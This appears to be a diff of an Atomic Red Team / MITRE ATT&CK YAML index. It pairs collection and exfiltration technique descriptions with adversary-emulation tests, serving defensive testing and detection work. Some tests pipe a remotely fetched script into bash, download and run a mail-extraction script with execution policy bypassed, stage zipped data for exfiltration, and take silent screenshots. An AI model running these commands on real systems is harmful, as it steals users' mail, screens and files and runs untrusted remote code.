- Processes that appear to be reading files from disparate locations and writing them to the same directory or file may be an indication of data being staged, especially if they are suspected of performing encryption or compression on the files, such as 7zip, RAR, ZIP, or zlib. Monitor publicly writeable directories, central locations, and commonly used staging directories (recycle bin, temp folders, etc.) to regularly check for compressed or encrypted data that may be indicative of staging.
-
- Monitor processes and command-line arguments for actions that could be taken to collect and combine files. Remote access tools with built-in features may interact directly with the Windows API to gather and copy to a location. Data may also be acquired and staged through Windows system management tools such as [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047) and [PowerShell](https://attack.mitre.org/techniques/T1059/001).
- x_mitre_data_sources:
- - Process command-line parameters
- - Process monitoring
- - File monitoring
- x_mitre_platforms:
- - Linux
- - macOS
- - Windows
- identifier: T1074.001
- atomic_tests:
- - name: Stage data from Discovery.bat
- auto_generated_guid: 107706a5-6f9f-451a-adae-bab8c667829f
- description: |
- Utilize powershell to download discovery.bat and save to a local file. This emulates an attacker downloading data collection tools onto the host. Upon execution,
- verify that the file is saved in the temp directory.
- supported_platforms:
- - windows
- input_arguments:
- output_file:
- description: Location to save downloaded discovery.bat file
- type: Path
- default: "$env:TEMP\\discovery.bat"
- executor:
- command: 'Invoke-WebRequest "https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1074.001/src/Discovery.bat"
- -OutFile #{output_file}
-
-'
- cleanup_command: 'Remove-Item -Force #{output_file} -ErrorAction Ignore
-
-'
- name: powershell
- - name: Stage data from Discovery.sh
- auto_generated_guid: 39ce0303-ae16-4b9e-bb5b-4f53e8262066
- description: 'Utilize curl to download discovery.sh and execute a basic information
- gathering shell script
-
-'
- supported_platforms:
- - linux
- - macos
- input_arguments:
- output_file:
- description: Location to save downloaded discovery.bat file
- type: Path
- default: "/tmp/T1074.001_discovery.log"
- executor:
- command: 'curl -s https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1074.001/src/Discovery.sh
- | bash -s > #{output_file}
-
-'
- name: bash
- - name: Zip a Folder with PowerShell for Staging in Temp
- auto_generated_guid: a57fbe4b-3440-452a-88a7-943531ac872a
- description: |
- Use living off the land tools to zip a file and stage it in the Windows temporary folder for later exfiltration. Upon execution, Verify that a zipped folder named Folder_to_zip.zip
- was placed in the temp directory.
- supported_platforms:
- - windows
- input_arguments:
- output_file:
- description: Location to save zipped file or folder
- type: Path
- default: "$env:TEMP\\Folder_to_zip.zip"
- input_file:
- description: Location of file or folder to zip
- type: Path
- default: PathToAtomicsFolder\T1074.001\bin\Folder_to_zip
- executor:
- command: 'Compress-Archive -Path #{input_file} -DestinationPath #{output_file}
- -Force
-
-'
- cleanup_command: 'Remove-Item -Path #{output_file} -ErrorAction Ignore
-
-'
- name: powershell
- T1114.001:
- technique:
- created: '2020-02-19T18:46:06.098Z'
- modified: '2020-03-24T17:59:20.983Z'
- kill_chain_phases:
- - kill_chain_name: mitre-attack
- phase_name: collection
- type: attack-pattern
- id: attack-pattern--1e9eb839-294b-48cc-b0d3-c45555a2a004
- description: |-
- Adversaries may target user email on local systems to collect sensitive information. Files containing email data can be acquired from a user’s local system, such as Outlook storage or cache files.
-
- Outlook stores data locally in offline data files with an extension of .ost. Outlook 2010 and later supports .ost file sizes up to 50GB, while earlier versions of Outlook support up to 20GB.(Citation: Outlook File Sizes) IMAP accounts in Outlook 2013 (and earlier) and POP accounts use Outlook Data Files (.pst) as opposed to .ost, whereas IMAP accounts in Outlook 2016 (and later) use .ost files. Both types of Outlook data files are typically stored in `C:\Users\\Documents\Outlook Files` or `C:\Users\\AppData\Local\Microsoft\Outlook`.(Citation: Microsoft Outlook Files)
- name: Local Email Collection
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- external_references:
- - source_name: mitre-attack
- external_id: T1114.001
- url: https://attack.mitre.org/techniques/T1114/001
- - source_name: Outlook File Sizes
- url: https://practical365.com/clients/office-365-proplus/outlook-cached-mode-ost-file-sizes/
- description: N. O'Bryan. (2018, May 30). Managing Outlook Cached Mode and
- OST File Sizes. Retrieved February 19, 2020.
- - source_name: Microsoft Outlook Files
- url: https://support.office.com/en-us/article/introduction-to-outlook-data-files-pst-and-ost-222eaf92-a995-45d9-bde2-f331f60e2790
- description: Microsoft. (n.d.). Introduction to Outlook Data Files (.pst and
- .ost). Retrieved February 19, 2020.
- x_mitre_platforms:
- - Windows
- x_mitre_data_sources:
- - Process monitoring
- - File monitoring
- - Authentication logs
- - Mail server
- x_mitre_detection: Monitor processes and command-line arguments for actions
- that could be taken to gather local email files. Monitor for unusual processes
- accessing local email files. Remote access tools with built-in features may
- interact directly with the Windows API to gather information. Information
- may also be acquired through Windows system management tools such as [Windows
- Management Instrumentation](https://attack.mitre.org/techniques/T1047) and
- [PowerShell](https://attack.mitre.org/techniques/T1059/001).
- x_mitre_permissions_required:
- - User
- x_mitre_is_subtechnique: true
- x_mitre_version: '1.0'
- identifier: T1114.001
- atomic_tests:
- - name: Email Collection with PowerShell Get-Inbox
- auto_generated_guid: 3f1b5096-0139-4736-9b78-19bcb02bb1cb
- description: |
- Search through local Outlook installation, extract mail, compress the contents, and saves everything to a directory for later exfiltration.
- Successful execution will produce stdout message stating "Please be patient, this may take some time...". Upon completion, final output will be a mail.csv file.
-
- Note: Outlook is required, but no email account necessary to produce artifacts.
- supported_platforms:
- - windows
- input_arguments:
- output_file:
- description: Output file path
- type: String
- default: "$env:TEMP\\mail.csv"
- file_path:
- description: File path for Get-Inbox.ps1
- type: String
- default: PathToAtomicsFolder\T1114.001\src
- dependency_executor_name: powershell
- dependencies:
- - description: 'Get-Inbox.ps1 must be located at #{file_path}
-
-'
- prereq_command: 'if (Test-Path #{file_path}\Get-Inbox.ps1) {exit 0} else {exit
- 1}
-
-'
- get_prereq_command: 'Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1114.001/src/Get-Inbox.ps1"
- -OutFile "#{file_path}\Get-Inbox.ps1"
-
-'
- executor:
- command: 'powershell -executionpolicy bypass -command #{file_path}\Get-Inbox.ps1
- -file #{output_file}
-
-'
- cleanup_command: 'Remove-Item #{output_file} -Force -ErrorAction Ignore
-
-'
- name: powershell
- T1185:
- technique:
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- external_references:
- - source_name: mitre-attack
- url: https://attack.mitre.org/techniques/T1185
- external_id: T1185
- - url: https://en.wikipedia.org/wiki/Man-in-the-browser
- description: Wikipedia. (2017, October 28). Man-in-the-browser. Retrieved
- January 10, 2018.
- source_name: Wikipedia Man in the Browser
- - url: https://www.cobaltstrike.com/help-browser-pivoting
- description: Mudge, R. (n.d.). Browser Pivoting. Retrieved January 10, 2018.
- source_name: Cobalt Strike Browser Pivot
- - url: https://www.icebrg.io/blog/malicious-chrome-extensions-enable-criminals-to-impact-over-half-a-million-users-and-global-businesses
- description: De Tore, M., Warner, J. (2018, January 15). MALICIOUS CHROME
- EXTENSIONS ENABLE CRIMINALS TO IMPACT OVER HALF A MILLION USERS AND GLOBAL
- BUSINESSES. Retrieved January 17, 2018.
- source_name: ICEBRG Chrome Extensions
- - url: https://cobaltstrike.com/downloads/csmanual38.pdf
- description: Strategic Cyber LLC. (2017, March 14). Cobalt Strike Manual.
- Retrieved May 24, 2017.
- source_name: cobaltstrike manual
- description: |-
- Adversaries can take advantage of security vulnerabilities and inherent functionality in browser software to change content, modify behavior, and intercept information as part of various man in the browser techniques. (Citation: Wikipedia Man in the Browser)
-
- A specific example is when an adversary injects software into a browser that allows an them to inherit cookies, HTTP sessions, and SSL client certificates of a user and use the browser as a way to pivot into an authenticated intranet. (Citation: Cobalt Strike Browser Pivot) (Citation: ICEBRG Chrome Extensions)
-
- Browser pivoting requires the SeDebugPrivilege and a high-integrity process to execute. Browser traffic is pivoted from the adversary's browser through the user's browser by setting up an HTTP proxy which will redirect any HTTP and HTTPS traffic. This does not alter the user's traffic in any way. The proxy connection is severed as soon as the browser is closed. Whichever browser process the proxy is injected into, the adversary assumes the security context of that process. Browsers typically create a new process for each tab that is opened and permissions and certificates are separated accordingly. With these permissions, an adversary could browse to any resource on an intranet that is accessible through the browser and which the browser has sufficient permissions, such as Sharepoint or webmail. Browser pivoting also eliminates the security provided by 2-factor authentication. (Citation: cobaltstrike manual)
- name: Man in the Browser
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- id: attack-pattern--544b0346-29ad-41e1-a808-501bb4193f47
- type: attack-pattern
- kill_chain_phases:
- - kill_chain_name: mitre-attack
- phase_name: collection
- modified: '2020-07-14T19:39:44.590Z'
- created: '2018-01-16T16:13:52.465Z'
- x_mitre_is_subtechnique: false
- x_mitre_version: '1.0'
- x_mitre_contributors:
- - Justin Warner, ICEBRG
- x_mitre_data_sources:
- - Authentication logs
- - Packet capture
- - Process monitoring
- - API monitoring
- x_mitre_detection: This is a difficult technique to detect because adversary
- traffic would be masked by normal user traffic. No new processes are created
- and no additional software touches disk. Authentication logs can be used to
- audit logins to specific web applications, but determining malicious logins
- versus benign logins may be difficult if activity matches typical user behavior.
- Monitor for process injection against browser applications
- x_mitre_permissions_required:
- - Administrator
- - SYSTEM
- x_mitre_platforms:
- - Windows
- atomic_tests: []
- T1557:
- technique:
- external_references:
- - source_name: mitre-attack
- external_id: T1557
- url: https://attack.mitre.org/techniques/T1557
- - external_id: CAPEC-94
- source_name: capec
- url: https://capec.mitre.org/data/definitions/94.html
- - source_name: Rapid7 MiTM Basics
- url: https://www.rapid7.com/fundamentals/man-in-the-middle-attacks/
- description: Rapid7. (n.d.). Man-in-the-Middle (MITM) Attacks. Retrieved March
- 2, 2020.
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- name: Man-in-the-Middle
- description: |-
- Adversaries may attempt to position themselves between two or more networked devices using a man-in-the-middle (MiTM) technique to support follow-on behaviors such as [Network Sniffing](https://attack.mitre.org/techniques/T1040) or [Transmitted Data Manipulation](https://attack.mitre.org/techniques/T1565/002). By abusing features of common networking protocols that can determine the flow of network traffic (e.g. ARP, DNS, LLMNR, etc.), adversaries may force a device to communicate through an adversary controlled system so they can collect information or perform additional actions.(Citation: Rapid7 MiTM Basics)
-
- Adversaries may leverage the MiTM position to attempt to modify traffic, such as in [Transmitted Data Manipulation](https://attack.mitre.org/techniques/T1565/002). Adversaries can also stop traffic from flowing to the appropriate destination, causing denial of service.
- id: attack-pattern--035bb001-ab69-4a0b-9f6c-2de8b09e1b9d
- type: attack-pattern
- kill_chain_phases:
- - kill_chain_name: mitre-attack
- phase_name: credential-access
- - kill_chain_name: mitre-attack
- phase_name: collection
- modified: '2020-03-31T13:54:08.535Z'
- created: '2020-02-11T19:07:12.114Z'
- x_mitre_contributors:
- - Daniil Yugoslavskiy, @yugoslavskiy, Atomic Threat Coverage project
- x_mitre_detection: Monitor network traffic for anomalies associated with known
- MiTM behavior. Consider monitoring for modifications to system configuration
- files involved in shaping network traffic flow.
- x_mitre_data_sources:
- - File monitoring
- - Netflow/Enclave netflow
- - Packet capture
- x_mitre_permissions_required:
- - User
- x_mitre_version: '1.0'
- x_mitre_is_subtechnique: false
- x_mitre_platforms:
- - Windows
- - macOS
- - Linux
- atomic_tests: []
- T1074.002:
- technique:
- external_references:
- - source_name: mitre-attack
- external_id: T1074.002
- url: https://attack.mitre.org/techniques/T1074/002
- - source_name: Mandiant M-Trends 2020
- url: https://content.fireeye.com/m-trends/rpt-m-trends-2020
- description: FireEye / Mandiant. (2020, February). M-Trends 2020. Retrieved
- April 24, 2020.
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- name: Remote Data Staging
- description: |-
- Adversaries may stage data collected from multiple systems in a central location or directory on one system prior to Exfiltration. Data may be kept in separate files or combined into one file through techniques such as [Archive Collected Data](https://attack.mitre.org/techniques/T1560). Interactive command shells may be used, and common functionality within [cmd](https://attack.mitre.org/software/S0106) and bash may be used to copy data into a staging location.
-
- In cloud environments, adversaries may stage data within a particular instance or virtual machine before exfiltration. An adversary may [Create Cloud Instance](https://attack.mitre.org/techniques/T1578/002) and stage data in that instance.(Citation: Mandiant M-Trends 2020)
-
- By staging data on one system prior to Exfiltration, adversaries can minimize the number of connections made to their C2 server and better evade detection.
- id: attack-pattern--359b00ad-9425-420b-bba5-6de8d600cbc0
- type: attack-pattern
- kill_chain_phases:
- - kill_chain_name: mitre-attack
- phase_name: collection
- modified: '2020-06-24T18:59:15.833Z'
- created: '2020-03-13T21:14:58.206Z'
- x_mitre_contributors:
- - Praetorian
- x_mitre_version: '1.0'
- x_mitre_is_subtechnique: true
- x_mitre_detection: |-
- Processes that appear to be reading files from disparate locations and writing them to the same directory or file may be an indication of data being staged, especially if they are suspected of performing encryption or compression on the files, such as 7zip, RAR, ZIP, or zlib. Monitor publicly writeable directories, central locations, and commonly used staging directories (recycle bin, temp folders, etc.) to regularly check for compressed or encrypted data that may be indicative of staging.
-
- Monitor processes and command-line arguments for actions that could be taken to collect and combine files. Remote access tools with built-in features may interact directly with the Windows API to gather and copy to a location. Data may also be acquired and staged through Windows system management tools such as [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047) and [PowerShell](https://attack.mitre.org/techniques/T1059/001).
- x_mitre_data_sources:
- - Process command-line parameters
- - Process monitoring
- - File monitoring
- x_mitre_platforms:
- - Linux
- - macOS
- - Windows
- - AWS
- - GCP
- - Azure
- atomic_tests: []
- T1114.002:
- technique:
- created: '2020-02-19T18:52:24.547Z'
- modified: '2020-02-19T20:53:50.908Z'
- kill_chain_phases:
- - kill_chain_name: mitre-attack
- phase_name: collection
- type: attack-pattern
- id: attack-pattern--b4694861-542c-48ea-9eb1-10d356e7140a
- description: Adversaries may target an Exchange server or Office 365 to collect
- sensitive information. Adversaries may leverage a user's credentials and interact
- directly with the Exchange server to acquire information from within a network.
- Adversaries may also access externally facing Exchange services or Office
- 365 to access email using credentials or access tokens. Tools such as [MailSniper](https://attack.mitre.org/software/S0413)
- can be used to automate searches for specific keywords.
- name: Remote Email Collection
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- external_references:
- - source_name: mitre-attack
- external_id: T1114.002
- url: https://attack.mitre.org/techniques/T1114/002
- x_mitre_platforms:
- - Office 365
- - Windows
- x_mitre_data_sources:
- - Authentication logs
- - Email gateway
- - Mail server
- - Office 365 trace logs
- x_mitre_detection: 'Monitor for unusual login activity from unknown or abnormal
- locations, especially for privileged accounts (ex: Exchange administrator
- account).'
- x_mitre_is_subtechnique: true
- x_mitre_version: '1.0'
- atomic_tests: []
- T1113:
- technique:
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- external_references:
- - source_name: mitre-attack
- external_id: T1113
- url: https://attack.mitre.org/techniques/T1113
- - external_id: CAPEC-648
- source_name: capec
- url: https://capec.mitre.org/data/definitions/648.html
- - source_name: CopyFromScreen .NET
- url: https://docs.microsoft.com/en-us/dotnet/api/system.drawing.graphics.copyfromscreen?view=netframework-4.8
- description: Microsoft. (n.d.). Graphics.CopyFromScreen Method. Retrieved
- March 24, 2020.
- - url: https://blog.malwarebytes.com/threat-analysis/2017/01/new-mac-backdoor-using-antiquated-code/
- description: Thomas Reed. (2017, January 18). New Mac backdoor using antiquated
- code. Retrieved July 5, 2017.
- source_name: Antiquated Mac Malware
- description: 'Adversaries may attempt to take screen captures of the desktop
- to gather information over the course of an operation. Screen capturing functionality
- may be included as a feature of a remote access tool used in post-compromise
- operations. Taking a screenshot is also typically possible through native
- utilities or API calls, such as CopyFromScreen, xwd,
- or screencapture.(Citation: CopyFromScreen .NET)(Citation: Antiquated
- Mac Malware)
-
-'
- name: Screen Capture
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- id: attack-pattern--0259baeb-9f63-4c69-bf10-eb038c390688
- type: attack-pattern
- kill_chain_phases:
- - kill_chain_name: mitre-attack
- phase_name: collection
- modified: '2020-03-24T19:56:37.627Z'
- created: '2017-05-31T21:31:25.060Z'
- x_mitre_is_subtechnique: false
- x_mitre_version: '1.1'
- x_mitre_data_sources:
- - API monitoring
- - Process monitoring
- - File monitoring
- x_mitre_detection: Monitoring for screen capture behavior will depend on the
- method used to obtain data from the operating system and write output files.
- Detection methods could include collecting information from unusual processes
- using API calls used to obtain image data, and monitoring for image files
- written to disk. The sensor data may need to be correlated with other events
- to identify malicious activity, depending on the legitimacy of this behavior
- within a given network environment.
- x_mitre_platforms:
- - Linux
- - macOS
- - Windows
- identifier: T1113
- atomic_tests:
- - name: Screencapture
- auto_generated_guid: 0f47ceb1-720f-4275-96b8-21f0562217ac
- description: 'Use screencapture command to collect a full desktop screenshot
-
-'
- supported_platforms:
- - macos
- input_arguments:
- output_file:
- description: Output file path
- type: Path
- default: "/tmp/T1113_desktop.png"
- executor:
- command: 'screencapture #{output_file}
-
-'
- cleanup_command: 'rm #{output_file}
-
-'
- name: bash
- - name: Screencapture (silent)
- auto_generated_guid: deb7d358-5fbd-4dc4-aecc-ee0054d2d9a4
- description: 'Use screencapture command to collect a full desktop screenshot
-
-'
- supported_platforms:
- - macos
- input_arguments:
- output_file:
- description: Output file path
- type: Path
- default: "/tmp/T1113_desktop.png"
- executor:
- command: 'screencapture -x #{output_file}
-
-'
- cleanup_command: 'rm #{output_file}
-
-'
- name: bash
- - name: X Windows Capture
- auto_generated_guid: 8206dd0c-faf6-4d74-ba13-7fbe13dce6ac
- description: 'Use xwd command to collect a full desktop screenshot and review
- file with xwud
-
-'
- supported_platforms:
- - linux
- input_arguments:
- output_file:
- description: Output file path
- type: Path
- default: "/tmp/T1113_desktop.xwd"
- executor:
- command: |
- xwd -root -out #{output_file}
- xwud -in #{output_file}
- cleanup_command: 'rm #{output_file}
-
-'
- name: bash
- - name: Capture Linux Desktop using Import Tool
- auto_generated_guid: 9cd1cccb-91e4-4550-9139-e20a586fcea1
- description: 'Use import command from ImageMagick to collect a full desktop
- screenshot
-
-'
- supported_platforms:
- - linux
- input_arguments:
- output_file:
- description: Output file path
- type: Path
- default: "/tmp/T1113_desktop.png"
- dependencies:
- - description: 'ImageMagick must be installed
-
-'
- prereq_command: 'if import --version; then exit 0; else exit 1; fi
-
-'
- get_prereq_command: 'sudo apt-get -y install imagemagick
-
-'
- executor:
- command: 'import -window root #{output_file}
-
-'
- cleanup_command: 'rm #{output_file}
-
-'
- name: bash
- - name: Windows Screencapture
- auto_generated_guid: 3c898f62-626c-47d5-aad2-6de873d69153
- description: 'Use Psr.exe binary to collect screenshots of user display. Test
- will do left mouse click to simulate user behaviour
-
-'
- supported_platforms:
- - windows
- input_arguments:
- output_file:
- description: Output file path
- type: Path
- default: c:\temp\T1113_desktop.zip
- recording_time:
- description: Time to take screenshots
- type: String
- default: 5
- executor:
- name: powershell
- elevation_required: false
- command: |
- cmd /c start /b psr.exe /start /output #{output_file} /sc 1 /gui 0 /stopevent 12
- Add-Type -MemberDefinition '[DllImport("user32.dll")] public static extern void mouse_event(int flags, int dx, int dy, int cButtons, int info);' -Name U32 -Namespace W;
- [W.U32]::mouse_event(0x02 -bor 0x04 -bor 0x01, 0, 0, 0, 0);
- cmd /c "timeout #{recording_time} > NULL && psr.exe /stop"
- cleanup_command: 'rm #{output_file} -ErrorAction Ignore'
- T1213.002:
- technique:
- external_references:
- - source_name: mitre-attack
- external_id: T1213.002
- url: https://attack.mitre.org/techniques/T1213/002
- - url: https://support.office.com/en-us/article/configure-audit-settings-for-a-site-collection-a9920c97-38c0-44f2-8bcb-4cf1e2ae22d2
- description: Microsoft. (2017, July 19). Configure audit settings for a site
- collection. Retrieved April 4, 2018.
- source_name: Microsoft SharePoint Logging
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- name: Sharepoint
- description: |
- Adversaries may leverage the SharePoint repository as a source to mine valuable information. SharePoint will often contain useful information for an adversary to learn about the structure and functionality of the internal network and systems. For example, the following is a list of example information that may hold potential value to an adversary and may also be found on SharePoint:
-
- * Policies, procedures, and standards
- * Physical / logical network diagrams
- * System architecture diagrams
- * Technical system documentation
- * Testing / development credentials
- * Work / project schedules
- * Source code snippets
- * Links to network shares and other internal resources
- id: attack-pattern--0c4b4fda-9062-47da-98b9-ceae2dcf052a
- type: attack-pattern
- kill_chain_phases:
- - kill_chain_name: mitre-attack
- phase_name: collection
- modified: '2020-03-24T16:41:00.821Z'
- created: '2020-02-14T13:35:32.938Z'
- x_mitre_detection: "The user access logging within Microsoft's SharePoint can
- be configured to report access to certain pages and documents. (Citation:
- Microsoft SharePoint Logging). As information repositories generally have
- a considerably large user base, detection of malicious use can be non-trivial.
- At minimum, access to information repositories performed by privileged users
- (for example, Active Directory Domain, Enterprise, or Schema Administrators)
- should be closely monitored and alerted upon, as these types of accounts should
- not generally used to access information repositories. If the capability exists,
- it may be of value to monitor and alert on users that are retrieving and viewing
- a large number of documents and pages; this behavior may be indicative of
- programmatic means being used to retrieve all data within the repository.
- In environments with high-maturity, it may be possible to leverage User-Behavioral
- Analytics (UBA) platforms to detect and alert on user based anomalies. \n\n"
- x_mitre_data_sources:
- - Office 365 audit logs
- - Authentication logs
- - Application logs
- x_mitre_version: '1.0'
- x_mitre_is_subtechnique: true
- x_mitre_permissions_required:
- - User
- x_mitre_platforms:
- - Windows
- - Office 365
- atomic_tests: []
- T1125:
- technique:
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- external_references:
- - source_name: mitre-attack
- url: https://attack.mitre.org/techniques/T1125
- external_id: T1125
- - external_id: CAPEC-634
- source_name: capec
- url: https://capec.mitre.org/data/definitions/634.html
- - url: https://objective-see.com/blog/blog_0x25.html
- description: Patrick Wardle. (n.d.). Retrieved March 20, 2018.
- source_name: objective-see 2017 review
- description: |-
- An adversary can leverage a computer's peripheral devices (e.g., integrated cameras or webcams) or applications (e.g., video call services) to capture video recordings for the purpose of gathering information. Images may also be captured from devices or applications, potentially in specified intervals, in lieu of video files.
-
- Malware or scripts may be used to interact with the devices through an available API provided by the operating system or an application to capture video or images. Video or image files may be written to disk and exfiltrated later. This technique differs from [Screen Capture](https://attack.mitre.org/techniques/T1113) due to use of specific devices or applications for video recording rather than capturing the victim's screen.
-
- In macOS, there are a few different malware samples that record the user's webcam such as FruitFly and Proton. (Citation: objective-see 2017 review)
- name: Video Capture
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- id: attack-pattern--6faf650d-bf31-4eb4-802d-1000cf38efaf
- type: attack-pattern
- kill_chain_phases:
- - kill_chain_name: mitre-attack
- phase_name: collection
- modified: '2020-07-14T19:40:47.644Z'
- created: '2017-05-31T21:31:37.917Z'
- x_mitre_is_subtechnique: false
- x_mitre_version: '1.0'
- x_mitre_contributors:
- - Praetorian
- x_mitre_data_sources:
- - Process monitoring
- - File monitoring
- - API monitoring
- x_mitre_detection: |-
- Detection of this technique may be difficult due to the various APIs that may be used. Telemetry data regarding API use may not be useful depending on how a system is normally used, but may provide context to other potentially malicious activity occurring on a system.
-
- Behavior that could indicate technique use include an unknown or unusual process accessing APIs associated with devices or software that interact with the video camera, recording devices, or recording software, and a process periodically writing files to disk that contain video or camera image data.
- x_mitre_permissions_required:
- - User
- x_mitre_platforms:
- - Windows
- - macOS
- atomic_tests: []
- T1056.003:
- technique:
- created: '2020-02-11T18:59:50.058Z'
- modified: '2020-03-24T21:16:16.580Z'
- kill_chain_phases:
- - kill_chain_name: mitre-attack
- phase_name: collection
- - kill_chain_name: mitre-attack
- phase_name: credential-access
- type: attack-pattern
- id: attack-pattern--69e5226d-05dc-4f15-95d7-44f5ed78d06e
- description: |-
- Adversaries may install code on externally facing portals, such as a VPN login page, to capture and transmit credentials of users who attempt to log into the service. For example, a compromised login page may log provided user credentials before logging the user in to the service.
-
- This variation on input capture may be conducted post-compromise using legitimate administrative access as a backup measure to maintain network access through [External Remote Services](https://attack.mitre.org/techniques/T1133) and [Valid Accounts](https://attack.mitre.org/techniques/T1078) or as part of the initial compromise by exploitation of the externally facing web service.(Citation: Volexity Virtual Private Keylogging)
- name: Web Portal Capture
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- external_references:
- - source_name: mitre-attack
- external_id: T1056.003
- url: https://attack.mitre.org/techniques/T1056/003
- - external_id: CAPEC-569
- source_name: capec
- url: https://capec.mitre.org/data/definitions/569.html
- - url: https://www.volexity.com/blog/2015/10/07/virtual-private-keylogging-cisco-web-vpns-leveraged-for-access-and-persistence/
- description: 'Adair, S. (2015, October 7). Virtual Private Keylogging: Cisco
- Web VPNs Leveraged for Access and Persistence. Retrieved March 20, 2017.'
- source_name: Volexity Virtual Private Keylogging
- x_mitre_platforms:
- - Linux
- - macOS
- - Windows
- x_mitre_is_subtechnique: true
- x_mitre_version: '1.0'
- x_mitre_detection: File monitoring may be used to detect changes to files in
- the Web directory for organization login pages that do not match with authorized
- updates to the Web server's content.
- x_mitre_data_sources:
- - File monitoring
- x_mitre_system_requirements:
- - An externally facing login portal is configured.
- atomic_tests: []
exfiltration:
T1020:
technique:
@@ -53690,13 +59328,14 @@ exfiltration:
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: exfiltration
- modified: '2020-03-11T13:58:08.219Z'
+ modified: '2020-10-22T02:24:54.881Z'
created: '2017-05-31T21:30:29.458Z'
x_mitre_is_subtechnique: false
x_mitre_platforms:
- Linux
- macOS
- Windows
+ - Network
x_mitre_network_requirements: true
x_mitre_detection: Monitor process file access patterns and network behavior.
Unrecognized processes or scripts that appear to be traversing file systems
@@ -53705,7 +59344,7 @@ exfiltration:
- File monitoring
- Process monitoring
- Process use of network
- x_mitre_version: '1.1'
+ x_mitre_version: '1.2'
identifier: T1020
atomic_tests:
- name: IcedID Botnet HTTP PUT
@@ -53821,8 +59460,25 @@ exfiltration:
name: sh
T1048:
technique:
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ created: '2017-05-31T21:30:44.720Z'
+ modified: '2020-03-28T00:50:31.548Z'
+ kill_chain_phases:
+ - kill_chain_name: mitre-attack
+ phase_name: exfiltration
+ type: attack-pattern
+ id: attack-pattern--a19e86f8-1c0a-4fea-8407-23b73d615776
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ name: Exfiltration Over Alternative Protocol
+ description: "Adversaries may steal data by exfiltrating it over a different
+ protocol than that of the existing command and control channel. The data may
+ also be sent to an alternate network location from the main command and control
+ server. \n\nAlternate protocols include FTP, SMTP, HTTP/S, DNS, SMB, or any
+ other network protocol not being used as the main command and control channel.
+ Different protocol channels could also include Web services such as cloud
+ storage. Adversaries may also opt to encrypt and/or obfuscate these alternate
+ channels. \n\n[Exfiltration Over Alternative Protocol](https://attack.mitre.org/techniques/T1048)
+ can be done using various common operating system utilities such as [Net](https://attack.mitre.org/software/S0039)/SMB
+ or FTP.(Citation: Palo Alto OilRig Oct 2016) "
external_references:
- source_name: mitre-attack
external_id: T1048
@@ -53835,46 +59491,29 @@ exfiltration:
description: Gardiner, J., Cova, M., Nagaraja, S. (2014, February). Command
& Control Understanding, Denying and Detecting. Retrieved April 20, 2016.
source_name: University of Birmingham C2
- description: "Adversaries may steal data by exfiltrating it over a different
- protocol than that of the existing command and control channel. The data may
- also be sent to an alternate network location from the main command and control
- server. \n\nAlternate protocols include FTP, SMTP, HTTP/S, DNS, SMB, or any
- other network protocol not being used as the main command and control channel.
- Different protocol channels could also include Web services such as cloud
- storage. Adversaries may also opt to encrypt and/or obfuscate these alternate
- channels. \n\n[Exfiltration Over Alternative Protocol](https://attack.mitre.org/techniques/T1048)
- can be done using various common operating system utilities such as [Net](https://attack.mitre.org/software/S0039)/SMB
- or FTP.(Citation: Palo Alto OilRig Oct 2016) "
- name: Exfiltration Over Alternative Protocol
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- id: attack-pattern--a19e86f8-1c0a-4fea-8407-23b73d615776
- type: attack-pattern
- kill_chain_phases:
- - kill_chain_name: mitre-attack
- phase_name: exfiltration
- modified: '2020-03-28T00:50:31.548Z'
- created: '2017-05-31T21:30:44.720Z'
- x_mitre_version: '1.2'
- x_mitre_data_sources:
- - Process monitoring
- - Process use of network
- - Packet capture
- - Netflow/Enclave netflow
- - Network protocol analysis
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_is_subtechnique: false
+ x_mitre_contributors:
+ - Alfredo Abarca
+ x_mitre_platforms:
+ - Linux
+ - macOS
+ - Windows
+ x_mitre_network_requirements: true
x_mitre_detection: 'Analyze network data for uncommon data flows (e.g., a client
sending significantly more data than it receives from a server). Processes
utilizing the network that do not normally have network communication or have
never been seen before are suspicious. Analyze packet contents to detect communications
that do not follow the expected protocol behavior for the port that is being
used. (Citation: University of Birmingham C2)'
- x_mitre_network_requirements: true
- x_mitre_platforms:
- - Linux
- - macOS
- - Windows
- x_mitre_contributors:
- - Alfredo Abarca
- x_mitre_is_subtechnique: false
+ x_mitre_data_sources:
+ - Process monitoring
+ - Process use of network
+ - Packet capture
+ - Netflow/Enclave netflow
+ - Network protocol analysis
+ x_mitre_version: '1.2'
identifier: T1048
